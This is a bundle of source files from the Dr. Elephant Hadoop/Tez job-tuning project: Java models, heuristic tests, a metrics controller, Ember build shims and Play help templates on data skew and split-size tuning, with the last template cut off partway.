public void testTaskLevelData() {
TezTaskData taskData[] = new TezTaskData[3];
TezCounterData counterData = new TezCounterData();
counterData.set(TezCounterData.CounterName.PHYSICAL_MEMORY_BYTES, 655577088L);
counterData.set(TezCounterData.CounterName.VIRTUAL_MEMORY_BYTES, 3051589632L);
long time[] = {0,0,0,1464218501117L, 1464218534148L};
taskData[0] = new TezTaskData("task", "id");
taskData[0].setTimeAndCounter(time,counterData);
taskData[1] = new TezTaskData("task", "id");
taskData[1].setTimeAndCounter(new long[5],counterData);
// Non-sampled task, which does not contain time and counter data
taskData[2] = new TezTaskData("task", "id");
TezTaskLevelAggregatedMetrics taskMetrics = new TezTaskLevelAggregatedMetrics(taskData, 4096L, 1463218501117L);
Assert.assertEquals(taskMetrics.getDelay(), 1000000000L);
Assert.assertEquals(taskMetrics.getResourceUsed(), 135168L);
Assert.assertEquals(taskMetrics.getResourceWasted(), 66627L);
}
}
<|start_filename|>app/views/help/tez/helpScopeTaskDataSkew.scala.html<|end_filename|>
@*
* Copyright 2016 LinkedIn Corp.
*
* Licensed under the Apache License, Version 2.0 (the "License"); you may not
* use this file except in compliance with the License. You may obtain a copy of
* the License at
*
* http://www.apache.org/licenses/LICENSE-2.0
*
* Unless required by applicable law or agreed to in writing, software
* distributed under the License is distributed on an "AS IS" BASIS, WITHOUT
* WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the
* License for the specific language governing permissions and limitations under
* the License.
*@
<p>
This analysis shows whether the parameters need to be adjusted for the tasks
</p>
<p>
This result of the analysis shows two groups of the spectrum, where the first group has significantly less input data compared to the second group.
</p>
<h5>Example</h5>
<p>
<div class="list-group">
<a class="list-group-item list-group-item-danger" href="">
<h4 class="list-group-item-heading">Mapper Data Skew</h4>
<table class="list-group-item-text table table-condensed left-table">
<thead><tr><th colspan="2">Severity: Critical</th></tr></thead>
<tbody>
<tr>
<td>Number of tasks</td>
<td>2205</td>
</tr>
<tr>
<td>Group A</td>
<td>953 tasks @@ 7 MB avg</td>
</tr>
<tr>
<td>Group B</td>
<td>1252 tasks @@ 512 MB avg</td>
</tr>
</tbody>
</table>
</a>
</div>
</p>
<h3>Suggestions</h3>
<p>
In Tez input tasks sizes are computed by grouping splits together. Please check if tez.grouping.split-count=XX is set. If set, XX number of tasks will be used to read input data.
Else the verify if tez.grouping.min-size and tez.grouping.max-size set to adjust the number of tasks being launched.
If there are multiple small files which need to combined, use
set pig.splitCombination to true;
set set pig.maxCombinedSplitSize XXXXX</p>
<|start_filename|>app/models/TuningJobExecutionParamSet.java<|end_filename|>
/*
* Copyright 2016 LinkedIn Corp.
*
* Licensed under the Apache License, Version 2.0 (the "License"); you may not
* use this file except in compliance with the License. You may obtain a copy of
* the License at
*
* http://www.apache.org/licenses/LICENSE-2.0
*
* Unless required by applicable law or agreed to in writing, software
* distributed under the License is distributed on an "AS IS" BASIS, WITHOUT
* WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the
* License for the specific language governing permissions and limitations under
* the License.
*/
package models;
import com.avaje.ebean.annotation.UpdatedTimestamp;
import java.sql.Timestamp;
import javax.persistence.CascadeType;
import javax.persistence.Column;
import javax.persistence.Entity;
import javax.persistence.JoinColumn;
import javax.persistence.JoinTable;
import javax.persistence.OneToOne;
import javax.persistence.Table;
import play.db.ebean.Model;
@Entity
@Table(name = "tuning_job_execution_param_set")
public class TuningJobExecutionParamSet extends Model {
private static final long serialVersionUID = 1L;
public static class TABLE {
public static final String TABLE_NAME = "tuning_job_execution_param_set";
public static final String jobSuggestedParamSet = "jobSuggestedParamSet";
public static final String jobExecution = "jobExecution";
public static final String tuningEnabled = "tuningEnabled";
public static final String createdTs = "createdTs";
public static final String updatedTs = "updatedTs";
}
@OneToOne(cascade = CascadeType.ALL)
@JoinTable(name = "job_suggested_param_set", joinColumns = {@JoinColumn(name = "job_suggested_param_set_id", referencedColumnName = "id")})
public JobSuggestedParamSet jobSuggestedParamSet;
@OneToOne(cascade = CascadeType.ALL)
@JoinTable(name = "job_execution", joinColumns = {@JoinColumn(name = "job_execution_id", referencedColumnName = "id")})
public JobExecution jobExecution;
public Boolean tuningEnabled;
@Column(nullable = false)
public Timestamp createdTs;
@Column(nullable = false)
@UpdatedTimestamp
public Timestamp updatedTs;
public static Finder<Long, TuningJobExecutionParamSet> find =
new Finder<Long, TuningJobExecutionParamSet>(Long.class, TuningJobExecutionParamSet.class);
@Override
public void save() {
this.updatedTs = new Timestamp(System.currentTimeMillis());
super.save();
}
@Override
public void update() {
this.updatedTs = new Timestamp(System.currentTimeMillis());
super.update();
}
}
<|start_filename|>app/views/help/tez/helpMapperTime.scala.html<|end_filename|>
@*
* Copyright 2016 LinkedIn Corp.
*
* Licensed under the Apache License, Version 2.0 (the "License"); you may not
* use this file except in compliance with the License. You may obtain a copy of
* the License at
*
* http://www.apache.org/licenses/LICENSE-2.0
*
* Unless required by applicable law or agreed to in writing, software
* distributed under the License is distributed on an "AS IS" BASIS, WITHOUT
* WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the
* License for the specific language governing permissions and limitations under
* the License.
*@
<p>
This analysis shows how well the number of input tasks in Tez job is adjusted.<br>
This should allow you to better tweak the number of input tasks for your job.<br>
</p>
<h5>Example</h5>
<p>
<div class="list-group">
<a class="list-group-item list-group-item-danger" href="#">
<h4 class="list-group-item-heading">Mapper Input Size</h4>
<table class="list-group-item-text table table-condensed left-table">
<thead><tr><th colspan="2">Severity: Critical</th></tr></thead>
<tbody>
<tr>
<td>Number of tasks</td>
<td>1516</td>
</tr>
<tr>
<td>Average task input size</td>
<td>19 KB</td>
</tr>
<tr>
<td>Average task runtime</td>
<td>1min 32s</td>
</tr>
</tbody>
</table>
</a>
</div>
</p>
<h4>Suggestions</h4>
<p>
You should tune mapper split size to reduce number of mappers and let each mapper process larger data <br>
The parameters for changing split size are: <br>
<ul>
<li>pig.splitCombination to true (Pig Only)</li>
<li>pig.maxCombinedSplitSize (Pig Only)</li>
</ul>
Examples on how to set them:
<ul>
<li>Pig: set pig.maxCombinedSplitSize XXXXX </li>
<li>Hive: set tez.grouping.min-size=XXXXX</li>
<li>set tez.grouping.max-size=XXXXX</li>
</ul>
The split size is controlled by formula <b>max(minSplitSize, min(maxSplitSize, blockSize))</b>. By default,
blockSize=512MB and minSplit < blockSize < maxSplit. <br>
You should always refer to this formula.<br>
In the case above, try <b>increasing min split size</b> and let each mapper process larger data.<br>
<br>
See <a href="https://github.com/linkedin/dr-elephant/wiki/Tuning-Tips">Hadoop Tuning Tips</a> for further information.<br>
</p>
<|start_filename|>app/models/JobSuggestedParamSet.java<|end_filename|>
/*
* Copyright 2016 LinkedIn Corp.
*
* Licensed under the Apache License, Version 2.0 (the "License"); you may not
* use this file except in compliance with the License. You may obtain a copy of
* the License at
*
* http://www.apache.org/licenses/LICENSE-2.0
*
* Unless required by applicable law or agreed to in writing, software
* distributed under the License is distributed on an "AS IS" BASIS, WITHOUT
* WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the
* License for the specific language governing permissions and limitations under
* the License.
*/
package models;
import com.avaje.ebean.annotation.UpdatedTimestamp;
import java.sql.Timestamp;
import javax.persistence.CascadeType;
import javax.persistence.Column;
import javax.persistence.Entity;
import javax.persistence.EnumType;
import javax.persistence.Enumerated;
import javax.persistence.GeneratedValue;
import javax.persistence.GenerationType;
import javax.persistence.Id;
import javax.persistence.JoinColumn;
import javax.persistence.JoinTable;
import javax.persistence.ManyToOne;
import javax.persistence.OneToOne;
import javax.persistence.Table;
import play.db.ebean.Model;
@Entity
@Table(name = "job_suggested_param_set")
public class JobSuggestedParamSet extends Model {
private static final long serialVersionUID = -294471313051608818L;
public enum ParamSetStatus {
CREATED, SENT, EXECUTED, FITNESS_COMPUTED, DISCARDED
}
public static class TABLE {
public static final String TABLE_NAME = "job_suggested_param_set";
public static final String id = "id";
public static final String jobDefinition = "jobDefinition";
public static final String tuningAlgorithm = "tuningAlgorithm";
public static final String paramSetState = "paramSetState";
public static final String isParamSetDefault = "isParamSetDefault";
public static final String fitness = "fitness";
public static final String fitnessJobExecution = "fitnessJobExecution";
public static final String isParamSetBest = "isParamSetBest";
public static final String areConstraintsViolated = "areConstraintsViolated";
public static final String createdTs = "createdTs";
public static final String updatedTs = "updatedTs";
}
@Id
@GeneratedValue(strategy = GenerationType.IDENTITY)
public Long id;
@Column(nullable = false)
@OneToOne(cascade = CascadeType.ALL)
@JoinTable(name = "job_definition", joinColumns = {@JoinColumn(name = "job_definition_id", referencedColumnName = "id")})
public JobDefinition jobDefinition;
@OneToOne(cascade = CascadeType.ALL)
@JoinTable(name = "job_execution", joinColumns = {@JoinColumn(name = "fitness_job_execution_id", referencedColumnName = "id")})
public JobExecution fitnessJobExecution;
@Column(nullable = false)
@ManyToOne(cascade = CascadeType.ALL)
@JoinTable(name = "tuning_algorithm", joinColumns = {@JoinColumn(name = "tuning_algorithm_id", referencedColumnName = "id")})
public TuningAlgorithm tuningAlgorithm;
@Enumerated(EnumType.STRING)
public ParamSetStatus paramSetState;
@Column(nullable = false)
public Boolean isParamSetDefault;
public Double fitness;
@Column(nullable = false)
public Boolean isParamSetBest;
@Column(nullable = false)
public Boolean areConstraintsViolated;
@Column(nullable = false)
public Timestamp createdTs;
@Column(nullable = false)
@UpdatedTimestamp
public Timestamp updatedTs;
public static Model.Finder<Long, JobSuggestedParamSet> find =
new Model.Finder<Long, JobSuggestedParamSet>(Long.class, JobSuggestedParamSet.class);
@Override
public void save() {
this.updatedTs = new Timestamp(System.currentTimeMillis());
super.save();
}
@Override
public void update() {
this.updatedTs = new Timestamp(System.currentTimeMillis());
super.update();
}
}
<|start_filename|>bower_components/ember-cli-shims/tests/unit/general-importing-test.js<|end_filename|>
import require from 'require';
import { module, test } from 'qunit';
module('shims generally work');
test('ember shim', function(assert) {
assert.equal(self.Ember, require('ember').default);
});
test('ember-component', function(assert) {
assert.equal(self.Ember.Component, require('ember-component').default);
});
test('ember-runloop', function(assert) {
assert.equal(self.Ember.run.debounce, require('ember-runloop').debounce);
});
test('ember-helper', function(assert) {
assert.equal(self.Ember.Helper, require('ember-helper').default);
});
test('ember-set/ordered', function(assert) {
assert.equal(self.Ember.OrderedSet, require('ember-set/ordered').default);
});
<|start_filename|>bower_components/ember-cli-shims/index.js<|end_filename|>
/* eslint-env node */
'use strict';
var path = require('path');
var SilentError = require('silent-error');
var writeFile = require('broccoli-file-creator');
var MergeTrees = require('broccoli-merge-trees');
module.exports = {
name: 'ember-cli-shims',
included: function(app) {
this._super.included.apply(this, arguments);
var VersionChecker = require('ember-cli-version-checker');
var checker = new VersionChecker(this);
// specifically *not* trying to use `checker.forEmber` because
// we actually want to see if this is from npm for specific versions
var emberSourceDep = checker.for('ember-source', 'npm');
var emberCLIDep = checker.for('ember-cli', 'npm');
var emberSourceIncludesLegacyShims = emberSourceDep.gt('2.11.0-alpha.0') && emberSourceDep.lt('2.11.0-beta.5');
var emberCLISupportsOverridingShims = emberCLIDep.gt('2.11.0-alpha.0');
if (!emberCLISupportsOverridingShims) {
throw new SilentError('To consume ember-cli-shims from npm you must be using ember-cli@2.11.0-beta.1 or greater. Please update ember-cli to a newer version or remove ember-cli-shims from `package.json`.');
}
var projectBowerDeps = this.project.bowerDependencies();
if (projectBowerDeps['ember-cli-shims']) {
throw new SilentError('Using ember-cli-shims as both a bower dependency and an npm dependency is not supported. Please remove `ember-cli-shims` from `bower.json`.');
}
// ember-source@2.11.0-alpha and 2.11.0-beta series releases included
// their own legacy shims system, so this import is not needed with
// those ember-source versions
if (!emberSourceIncludesLegacyShims && emberCLISupportsOverridingShims) {
if (this.import) {
this.import('vendor/ember-cli-shims/deprecations.js');
this.import('vendor/ember-cli-shims/app-shims.js');
} else {
app.import('vendor/ember-cli-shims/deprecations.js');
app.import('vendor/ember-cli-shims/app-shims.js');
}
}
},
treeForVendor(vendorTree) {
var deprecations = require('./deprecations');
var rfc176Tree = writeFile('ember-cli-shims/deprecations.js', wrapJson('ember-cli-shims/deprecations', deprecations));
return new MergeTrees([vendorTree, rfc176Tree]);
},
};
function wrapJson(name, json) {
return `(function() {
define('${name}', [], function() {
var values = ${JSON.stringify(json)};
Object.defineProperty(values, '__esModule', {
value: true
});
return values;
});
})();`
}
<|start_filename|>bower_components/ember-cli-shims/deprecations.js<|end_filename|>
'use strict';
const mappings = require('ember-rfc176-data/mappings.json');
const deprecations = {};
mappings.filter(it => it.deprecated && it.replacement).filter(it => it.module.indexOf('ember-') === 0).forEach(it => {
if (!(it.module in deprecations)) {
deprecations[it.module] = {};
}
let replacement = [it.replacement.module];
if (it.replacement.export !== 'default') {
replacement.push(it.replacement.export);
}
deprecations[it.module][it.export] = replacement;
});
module.exports = deprecations;
<|start_filename|>app/com/linkedin/drelephant/tuning/Particle.java<|end_filename|>
/*
* Copyright 2016 LinkedIn Corp.
*
* Licensed under the Apache License, Version 2.0 (the "License"); you may not
* use this file except in compliance with the License. You may obtain a copy of
* the License at
*
* http://www.apache.org/licenses/LICENSE-2.0
*
* Unless required by applicable law or agreed to in writing, software
* distributed under the License is distributed on an "AS IS" BASIS, WITHOUT
* WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the
* License for the specific language governing permissions and limitations under
* the License.
*/
package com.linkedin.drelephant.tuning;
import com.fasterxml.jackson.annotation.JsonIgnoreProperties;
import com.fasterxml.jackson.annotation.JsonProperty;
import java.util.List;
/**
* Particle class represents a configuration set for a job
*/
@JsonIgnoreProperties(ignoreUnknown = true)
public class Particle {
@JsonProperty("_candidate")
// Todo: Candidate should be a Map<String, Double>?
// todo: rename _candidate to _configurationValues?
private List<Double> _candidate;
private double _fitness;
private double _birthdate;
private boolean _maximize;
@JsonProperty("paramSetId")
private Long _paramSetId;
/**
* Sets the configuration values
* @param candidate Configuration values
*/
public void setCandidate(List<Double> candidate) {
this._candidate = candidate;
}
/**
* Returns the configuration values
* @return Configuration values
*/
public List<Double> getCandidate() {
return _candidate;
}
/**
* Sets fitness of the configuration
* @param fitness Fitness
*/
public void setFitness(double fitness) {
this._fitness = fitness;
}
/**
* Returns the fitness of the configuration
* @return fitness
*/
public double getFitness() {
return _fitness;
}
/**
* Sets the birthdate of the configuration
* @param birthDate Birthdate
*/
public void setBirthdate(double birthDate) {
this._birthdate = birthDate;
}
/**
* Returns the birthdate of the configuration
* @return birth date
*/
public double getBirthdate() {
return _birthdate;
}
/**
* Sets maximize which represents whether the objective of optimization is to maximize or minimize the fitness
* @param maximize true if the ojective is to maximize fitness, false otherwise
*/
public void setMaximize(boolean maximize) {
this._maximize = maximize;
}
/**
* Returns maximize
* @return Maximize
*/
public boolean getMaximize() {
return _maximize;
}
/**
* Sets the param Set Id
* @param paramSetId Param Set Id
*/
public void setPramSetId(Long paramSetId) {
this._paramSetId = paramSetId;
}
/**
* Returns the param set id
* @return the param set id
*/
public Long getParamSetId() {
return _paramSetId;
}
}
<|start_filename|>app/views/help/tez/helpReducerDataSkew.scala.html<|end_filename|>
@*
* Copyright 2016 LinkedIn Corp.
*
* Licensed under the Apache License, Version 2.0 (the "License"); you may not
* use this file except in compliance with the License. You may obtain a copy of
* the License at
*
* http://www.apache.org/licenses/LICENSE-2.0
*
* Unless required by applicable law or agreed to in writing, software
* distributed under the License is distributed on an "AS IS" BASIS, WITHOUT
* WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the
* License for the specific language governing permissions and limitations under
* the License.
*@
<p>
This analysis shows whether there is a data-skew for reduce tasks of the Tez applicaiton.
</p>
<p>
This result of the analysis shows two groups of the spectrum, where the first group has significantly less input data compared to the second group.
</p>
<h5>Example</h5>
<p>
<div class="list-group">
<a class="list-group-item list-group-item-danger" href="">
<h4 class="list-group-item-heading">Reducer Data Skew</h4>
<table class="list-group-item-text table table-condensed left-table">
<thead><tr><th colspan="2">Severity: Critical</th></tr></thead>
<tbody>
<tr>
<td>Number of tasks</td>
<td>999</td>
</tr>
<tr>
<td>Group A</td>
<td>875 tasks @@ 28 MB avg</td>
</tr>
<tr>
<td>Group B</td>
<td>124 tasks @@ 2 GB avg</td>
</tr>
</tbody>
</table>
</a>
</div>
</p>
<h3>Suggestions</h3>
<p>
Check if the number of reducers are being determined appropriately. We can enable optimization of skew join i.e. imbalanced joins by setting hive.optimize.skewjoin property to true..<br>
set hive.optimize.skewjoin to true. By setting hive.skewjoin.key to a specified number like 10000, the job
can determine if the join is skewed or not.<br>
</p>
<|start_filename|>app/controllers/AutoTuningMetricsController.java<|end_filename|>
package controllers;
import static com.codahale.metrics.MetricRegistry.name;
import org.apache.log4j.Logger;
import play.Configuration;
import play.libs.Json;
import play.mvc.Controller;
import play.mvc.Result;
import com.codahale.metrics.Gauge;
import com.codahale.metrics.Meter;
import com.codahale.metrics.MetricRegistry;
import com.codahale.metrics.Timer;
import com.codahale.metrics.Timer.Context;
import com.linkedin.drelephant.AutoTuner;
public class AutoTuningMetricsController extends Controller {
private static final String METRICS_NOT_ENABLED = "Metrics not enabled";
private static MetricRegistry _metricRegistry = null;
private static final Logger logger = Logger.getLogger(AutoTuningMetricsController.class);
private static int _fitnessComputeWaitExecutions = -1;
private static int _baselineComputeWaitJobs = -1;
private static int _azkabanStatusUpdateWaitExecutions = -1;
private static int _paramSetGenerateWaitJobs = -1;
private static Meter _getCurrentRunParametersFailures;
private static Meter _fitnessComputedExecutions;
private static Meter _successfulExecutions;
private static Meter _failedExecutions;
private static Meter _paramSetGenerated;
private static Meter _baselineComputed;
private static Meter _paramSetNotFound;
private static Meter _newAutoTuningJob;
private static Timer _getCurrentRunParametersTimer;
public static void init() {
// Metrics registries will be initialized only if enabled
if (!Configuration.root().getBoolean("metrics", false)) {
logger.debug("Metrics not enabled in the conf file.");
return;
}
// Metrics & healthcheck registries will be initialized only once
if (_metricRegistry != null) {
logger.debug("Metric registries already initialized.");
return;
}
_metricRegistry = new MetricRegistry();
String autoTunerClassName = AutoTuner.class.getSimpleName();
String apiClassName = Application.class.getSimpleName();
//API timer and failed counts
_getCurrentRunParametersTimer = _metricRegistry.timer(name(apiClassName, "getCurrentRunParametersResponses"));
_getCurrentRunParametersFailures =
_metricRegistry.meter(name(apiClassName, "getCurrentRunParametersFailures", "count"));
//Daemon counters
_fitnessComputedExecutions = _metricRegistry.meter(name(autoTunerClassName, "fitnessComputedExecutions", "count"));
_successfulExecutions = _metricRegistry.meter(name(autoTunerClassName, "successfulExecutions", "count"));
_failedExecutions = _metricRegistry.meter(name(autoTunerClassName, "failedExecutions", "count"));
_paramSetGenerated = _metricRegistry.meter(name(autoTunerClassName, "paramSetGenerated", "count"));
_baselineComputed = _metricRegistry.meter(name(autoTunerClassName, "baselineComputed", "count"));
_paramSetNotFound = _metricRegistry.meter(name(autoTunerClassName, "paramSetNotFound", "count"));
_newAutoTuningJob = _metricRegistry.meter(name(autoTunerClassName, "newAutoTuningJob", "count"));
_metricRegistry.register(name(autoTunerClassName, "fitnessComputeWaitExecutions", "size"), new Gauge<Integer>() {
@Override
public Integer getValue() {
return _fitnessComputeWaitExecutions;
}
});
_metricRegistry.register(name(autoTunerClassName, "baselineComputeWaitJobs", "size"), new Gauge<Integer>() {
@Override
public Integer getValue() {
return _baselineComputeWaitJobs;
}
});
_metricRegistry.register(name(autoTunerClassName, "azkabanStatusUpdateWaitExecutions", "size"), new Gauge<Integer>() {
@Override
public Integer getValue() {
return _azkabanStatusUpdateWaitExecutions;
}
});
_metricRegistry.register(name(autoTunerClassName, "paramSetGenerateWaitJobs", "size"), new Gauge<Integer>() {
@Override
public Integer getValue() {
return _paramSetGenerateWaitJobs;
}
});
}
public static void setFitnessComputeWaitJobs(int fitnessComputeWaitJobs) {
_fitnessComputeWaitExecutions = fitnessComputeWaitJobs;
}
public static void setBaselineComputeWaitJobs(int baselineComputeWaitJobs) {
_baselineComputeWaitJobs = baselineComputeWaitJobs;
}
public static void setAzkabanStatusUpdateWaitJobs(int azkabanStatusUpdateWaitJobs) {
_azkabanStatusUpdateWaitExecutions = azkabanStatusUpdateWaitJobs;
}
public static void setParamSetGenerateWaitJobs(int paramSetGenerateWaitJobs) {
_paramSetGenerateWaitJobs = paramSetGenerateWaitJobs;
}
public static void markSuccessfulJobs() {
if (_successfulExecutions != null) {
_successfulExecutions.mark();
}
}
public static void markNewAutoTuningJob() {
if (_newAutoTuningJob != null) {
_newAutoTuningJob.mark();
}
}
public static void markParamSetNotFound() {
if (_paramSetNotFound != null) {
_paramSetNotFound.mark();
}
}
public static void markFailedJobs() {
if (_failedExecutions != null) {
_failedExecutions.mark();
}
}
public static void markParamSetGenerated() {
if (_paramSetGenerated != null) {
_paramSetGenerated.mark();
}
}
public static void markFitnessComputedJobs() {
if (_fitnessComputedExecutions != null) {
_fitnessComputedExecutions.mark();
}
}
public static void markBaselineComputed() {
if (_baselineComputed != null) {
_baselineComputed.mark();
}
}
public static void markGetCurrentRunParametersFailures() {
if (_getCurrentRunParametersFailures != null) {
_getCurrentRunParametersFailures.mark();
}
}
public static Context getCurrentRunParametersTimerContext() {
if(_getCurrentRunParametersTimer!=null)
{
return _getCurrentRunParametersTimer.time();
}else
{
return null;
}
}
/**
* The endpoint /metrics
* Endpoint can be queried if metrics is enabled.
*
* @return Will return all the metrics in Json format.
*/
public static Result index() {
if (_metricRegistry != null) {
return ok(Json.toJson(_metricRegistry));
} else {
return ok(Json.toJson(METRICS_NOT_ENABLED));
}
}
}
<|start_filename|>test/com/linkedin/drelephant/tez/heuristics/ReducerDataSkewHeuristicTest.java<|end_filename|>
/*
* Copyright 2017 Electronic Arts Inc.
*
* Licensed under the Apache License, Version 2.0 (the "License"); you may not
* use this file except in compliance with the License. You may obtain a copy of
* the License at
*
* http://www.apache.org/licenses/LICENSE-2.0
*
* Unless required by applicable law or agreed to in writing, software
* distributed under the License is distributed on an "AS IS" BASIS, WITHOUT
* WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the
* License for the specific language governing permissions and limitations under
* the License.
*
*/
package com.linkedin.drelephant.tez.heuristics;
import com.linkedin.drelephant.analysis.*;
import com.linkedin.drelephant.configurations.heuristic.HeuristicConfigurationData;
import com.linkedin.drelephant.tez.data.TezApplicationData;
import com.linkedin.drelephant.tez.data.TezCounterData;
import com.linkedin.drelephant.tez.data.TezTaskData;
import junit.framework.TestCase;
import java.io.IOException;
import java.util.HashMap;
import java.util.Map;
public class ReducerDataSkewHeuristicTest extends TestCase{
private static final long UNITSIZE = HDFSContext.HDFS_BLOCK_SIZE / 64; //1mb
private static final long UNITSIZETIME = 1000000; //1000sec
private static Map<String, String> paramsMap = new HashMap<String, String>();
private static Heuristic _heuristic = new ReducerDataSkewHeuristic(new HeuristicConfigurationData("test_heuristic",
"test_class", "test_view", new ApplicationType("test_apptype"), paramsMap));
public void testCritical() throws IOException {
assertEquals(Severity.CRITICAL, analyzeJob(200, 200, 1 * UNITSIZE, 100 * UNITSIZE));
}
public void testSevere() throws IOException {
assertEquals(Severity.SEVERE, analyzeJob(200, 200, 10 * UNITSIZE, 100 * UNITSIZE));
}
public void testModerate() throws IOException {
assertEquals(Severity.MODERATE, analyzeJob(200, 200, 20 * UNITSIZE, 100 * UNITSIZE));
}
public void testLow() throws IOException {
assertEquals(Severity.LOW, analyzeJob(200, 200, 30 * UNITSIZE, 100 * UNITSIZE));
}
public void testNone() throws IOException {
assertEquals(Severity.NONE, analyzeJob(200, 200, 50 * UNITSIZE, 100 * UNITSIZE));
}
public void testSmallFiles() throws IOException {
assertEquals(Severity.NONE, analyzeJob(200, 200, 1 * UNITSIZE, 5 * UNITSIZE));
}
public void testSmallTasks() throws IOException {
assertEquals(Severity.NONE, analyzeJob(5, 5, 10 * UNITSIZE, 100 * UNITSIZE));
}
public void testCriticalTime() throws IOException {
assertEquals(Severity.CRITICAL, analyzeJobTime(200, 200, 1 * UNITSIZETIME, 100 * UNITSIZETIME));
}
public void testSevereTime() throws IOException {
assertEquals(Severity.SEVERE, analyzeJobTime(200, 200, 10 * UNITSIZETIME, 100 * UNITSIZETIME));
}
public void testModerateTime() throws IOException {
assertEquals(Severity.MODERATE, analyzeJobTime(200, 200, 20 * UNITSIZETIME, 100 * UNITSIZETIME));
}
public void testLowTime() throws IOException {
assertEquals(Severity.LOW, analyzeJobTime(200, 200, 30 * UNITSIZETIME, 100 * UNITSIZETIME));
}
public void testNoneTime() throws IOException {
assertEquals(Severity.NONE, analyzeJobTime(200, 200, 50 * UNITSIZETIME, 100 * UNITSIZETIME));
}
public void testSmallTasksTime() throws IOException {
assertEquals(Severity.NONE, analyzeJobTime(5, 5, 10 * UNITSIZETIME, 100 * UNITSIZETIME));
}
private Severity analyzeJob(int numSmallTasks, int numLargeTasks, long smallInputSize, long largeInputSize)
throws IOException {
TezCounterData jobCounter = new TezCounterData();
TezTaskData[] reducers = new TezTaskData[numSmallTasks + numLargeTasks + 1];
TezCounterData smallCounter = new TezCounterData();
smallCounter.set(TezCounterData.CounterName.SHUFFLE_BYTES, smallInputSize);
TezCounterData largeCounter = new TezCounterData();
largeCounter.set(TezCounterData.CounterName.SHUFFLE_BYTES, largeInputSize);
int i = 0;
for (; i < numSmallTasks; i++) {
reducers[i] = new TezTaskData("task-id-"+i, "task-attempt-id-"+i);
reducers[i].setTimeAndCounter(new long[5], smallCounter);
}
for (; i < numSmallTasks + numLargeTasks; i++) {
reducers[i] = new TezTaskData("task-id-"+i, "task-attempt-id-"+i);
reducers[i].setTimeAndCounter(new long[5], largeCounter);
}
// Non-sampled task, which does not contain time and counter data
reducers[i] = new TezTaskData("task-id-"+i, "task-attempt-id-"+i);
TezApplicationData data = new TezApplicationData().setCounters(jobCounter).setReduceTaskData(reducers);
HeuristicResult result = _heuristic.apply(data);
return result.getSeverity();
}
private Severity analyzeJobTime(int numSmallTasks, int numLongTasks, long smallTimeTaken, long longTimeTaken)
throws IOException {
TezCounterData jobCounter = new TezCounterData();
TezTaskData[] reducers = new TezTaskData[numSmallTasks + numLongTasks + 1];
int i = 0;
for (; i < numSmallTasks; i++) {
reducers[i] = new TezTaskData("task-id-"+i, "task-attempt-id-"+i);
reducers[i].setTotalTimeMs(smallTimeTaken, true);
reducers[i].setCounter(jobCounter);
}
for (; i < numSmallTasks + numLongTasks; i++) {
reducers[i] = new TezTaskData("task-id-"+i, "task-attempt-id-"+i);
reducers[i].setTotalTimeMs(longTimeTaken, true);
reducers[i].setCounter(jobCounter);
}
// Non-sampled task, which does not contain time data
reducers[i] = new TezTaskData("task-id-"+i, "task-attempt-id-"+i);
TezApplicationData data = new TezApplicationData().setCounters(jobCounter).setReduceTaskData(reducers);
HeuristicResult result = _heuristic.apply(data);
return result.getSeverity();
}
}
<|start_filename|>app/com/linkedin/drelephant/tez/heuristics/TezScopeGCHeuristic.java<|end_filename|>
/*
* Copyright 2017 Electronic Arts Inc.
*
* Licensed under the Apache License, Version 2.0 (the "License"); you may not
* use this file except in compliance with the License. You may obtain a copy of
* the License at
*
* http://www.apache.org/licenses/LICENSE-2.0
*
* Unless required by applicable law or agreed to in writing, software
* distributed under the License is distributed on an "AS IS" BASIS, WITHOUT
* WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the
* License for the specific language governing permissions and limitations under
* the License.
*
*/
package com.linkedin.drelephant.tez.heuristics;
import com.linkedin.drelephant.configurations.heuristic.HeuristicConfigurationData;
import com.linkedin.drelephant.tez.data.TezApplicationData;
import com.linkedin.drelephant.tez.data.TezCounterData;
import com.linkedin.drelephant.tez.data.TezTaskData;
import com.linkedin.drelephant.util.Utils;
import java.util.ArrayList;
import java.util.Arrays;
import java.util.List;
import com.linkedin.drelephant.analysis.Heuristic;
import com.linkedin.drelephant.analysis.HeuristicResult;
import com.linkedin.drelephant.analysis.Severity;
import com.linkedin.drelephant.math.Statistics;
import java.util.Map;
import org.apache.log4j.Logger;
/**
* Analyses garbage collection efficiency
*/
public class TezScopeGCHeuristic extends GenericGCHeuristic {
private static final Logger logger = Logger.getLogger(MapperGCHeuristic.class);
public TezScopeGCHeuristic(HeuristicConfigurationData heuristicConfData) {
super(heuristicConfData);
}
@Override
protected TezTaskData[] getTasks(TezApplicationData data) {
return data.getScopeTasks();
}
}
<|start_filename|>app/views/tags/pagination.scala.html<|end_filename|>
@*
* Copyright 2016 LinkedIn Corp.
*
* Licensed under the Apache License, Version 2.0 (the "License"); you may not
* use this file except in compliance with the License. You may obtain a copy of
* the License at
*
* http://www.apache.org/licenses/LICENSE-2.0
*
* Unless required by applicable law or agreed to in writing, software
* distributed under the License is distributed on an "AS IS" BASIS, WITHOUT
* WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the
* License for the specific language governing permissions and limitations under
* the License.
*@
@(paginationStats: controllers.PaginationStats, route:Call)
@*
* The layout of the pagination bar.
*
* @param paginationStats The pagination information
* @param route the search call to be made
*@
<div class="pagination">
@searchQuery() = @{
var queryString = paginationStats.getQueryString()
if (queryString != null)
queryString + "&"
else
queryString
}
@if(paginationStats.getCurrentPage() == 1) {
<li class="disabled"><a href="./" onclick="return false;">Previous</a></li>
} else {
<li><a href="@route?@(searchQuery())page=@(paginationStats.getCurrentPage() - 1)">Previous</a></li>
}
@for(page <- paginationStats.getPaginationBarStartIndex() until paginationStats.getCurrentPage()) {
<li><a href="@route?@(searchQuery())page=@page">@page</a></li>
}
<li class="active"><a href="#">@(paginationStats.getCurrentPage())</a></li>
@for(page <- paginationStats.getCurrentPage() + 1 until paginationStats.getPaginationBarEndIndex() + 1) {
<li><a href="@route?@(searchQuery())page=@page">@page</a></li>
}
@if(paginationStats.getCurrentPage() == paginationStats.getPaginationBarEndIndex()) {
<li class="disabled"><a href="./" onclick="return false;">Next</a></li>
} else {
